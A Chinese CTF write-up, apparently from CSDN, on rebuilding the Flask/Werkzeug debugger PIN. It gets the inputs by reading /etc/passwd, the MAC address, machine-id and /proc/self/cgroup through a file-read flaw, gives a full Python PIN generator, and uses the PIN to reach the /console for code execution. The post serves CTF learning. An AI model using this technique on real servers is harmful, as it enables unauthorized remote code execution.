关于ctf中flask算pin总结

pin码是在flask启用debug模式时用于代码调试的安全入口,涉及的因素包括username、modname、appname、moddir、uuid和machine_id。生成过程包括混合public和private_bits,使用hashlib进行哈希,并根据特定格式形成PIN码。machine-id通常由/etc/machine-id或/proc/sys/kernel/random/boot_id提供。若存在权限,可以读取这些信息来构造PIN码进入调试模式或利用此知识进行安全测试。
摘要由CSDN通过智能技术生成

什么是pin码

pin码是flask在开启debug模式下,进行代码调试模式所需的进入密码,需要正确的PIN码才能进入调试模式,可以理解为自带的webshell

pin码如何生成

pin码生成要六要素
1.username 在可以任意文件读的条件下读 /etc/passwd进行猜测
2.modname 默认flask.app
3.appname 默认Flask
4.moddir flask库下app.py的绝对路径,可以通过报错拿到,如传参的时候给个不存在的变量
5.uuidnode mac地址的十进制,任意文件读 /sys/class/net/eth0/address
6.machine_id 机器码 这个待会细说,一般就生成pin码不对就是这错了

在python3.8以后生成的脚本如下

import hashlib
from itertools import chain
probably_public_bits = [
    'app',
    'flask.app',
    'Flask',
    '/usr/local/lib/python3.8/site-packages/flask/app.py' 
]

private_bits = [
    '2485376911915',
    '7265fe765262551a676151a24c02b7b646a18828428b87e35c5482255b121e8f7464b02e50ffe3f1d626f8c05793f49a'# get_machine_id(), /etc/machine-id  /proc/sys/kernel/random/boot_id
]   

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode("utf-8")
    h.update(bit)
h.update(b"cookiesalt")

cookie_name = f"__wzd{h.hexdigest()[:20]}"

# If we need to generate a pin we salt it a bit more so that we don't
# end up with the same value and generate out 9 digits
num = None
if num is None:
    h.update(b"pinsalt")
    num = f"{int(h.hexdigest(), 16):09d}"[:9]

# Format the pincode in groups of digits for easier remembering if
# we don't have a result yet.
rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = "-".join(
                num[x : x + group_size].rjust(group_size, "0")
                for x in range(0, len(num), group_size)
            )
            break
    else:
        rv = num

print(rv)

关于machine-id

如果能任意文件读尝试去读取/usr/local/lib/python3.7/site-packages/werkzeug/debug/__init__.py
上面的python版本可以通过报错拿到
去找里面的get_machine-id方法
在这里插入图片描述
可以知道/etc/machine-id/proc/sys/kernel/random/boot_id只要读取到其中一个就break的
然后继续拼接上/proc/self/cgroup下的用正则匹配到的值
其实肉眼也能看出来
那么很明了了
machine-id是又两个值拼接的
下面直接上例题

CTFSHOW801

在这里插入图片描述

probably_public_bits = [
    'root',#读/etc/passwd
    'flask.app',#默认
    'Flask',#默认
    '/usr/local/lib/python3.8/site-packages/flask/app.py' #报错得到
]

然后读网卡
在这里插入图片描述
转十进制
在这里插入图片描述
machine-id
/etc/machine-id读不到,那么就是/proc/sys/kernel/random/boot_id/proc/self/cgroup拼接了
得到machine-id
此处cgroup下读的是docker/后面的那串字符串
在这里插入图片描述
计算pin码得到548-952-682
然后报错或访问/consloe进控制台rce
在这里插入图片描述

过滤相关

本题中没有过滤,那么当过滤了self的时候怎么办呢
也就是/proc/self/cgroup没法用了
其中的self可以用相关进程的pid去替换,其实1就行
在这里插入图片描述
在这里插入图片描述
那么cgroup过滤了呢?
可以考虑mountinfo或者cpuset
在这里插入图片描述
在这里插入图片描述

接下里再看几题吧

HSCSEC-2TH EZFLASK

拿用户
在这里插入图片描述

拿版本
在这里插入图片描述
本题能读到/etc/machine-id
拼接得到
在这里插入图片描述

生成pin码进console

在这里插入图片描述
读不了flag,用环境下的readflag读

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值